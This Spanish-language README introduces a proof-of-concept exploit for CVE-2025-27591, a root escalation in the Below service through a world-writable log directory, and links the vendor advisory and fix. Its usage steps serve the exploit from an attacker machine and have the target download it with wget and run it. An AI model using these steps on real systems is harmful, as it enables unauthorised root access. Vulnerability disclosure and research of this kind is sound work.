
CVE-2025-27591 es una vulnerabilidad de escalada de privilegios que afectó al servicio Below antes de la versión 0.9.0
CVE-2025-27591 es una vulnerabilidad de escalada de privilegios que afectó al servicio Below antes de la versión 0.9.0. El problema surgió debido a la creación de un directorio con permisos de escritura mundial en /var/log/below. Un atacante podría explotar esta vulnerabilidad manipulando enlaces simbólicos dentro de este directorio y potencialmente obtener privilegios de root, lo que la convierte en una preocupación de seguridad significativa para usuarios locales sin privilegios.
Esta prueba de concepto fue escrita únicamente con fines educativos y de investigación.
Al momento de redactar esto, no existía una PoC disponible públicamente para esta vulnerabilidad en la comunidad. Por lo tanto, decidí compartir responsablemente esta implementación para llenar ese vacío, contribuir al ecosistema de investigación de seguridad y concienciar sobre la naturaleza crítica de un sistema de archivos inseguro.
Desde la máquina atacante:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
Desde el sistema vulnerable:
1- wget http:///exploit.py
2-python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3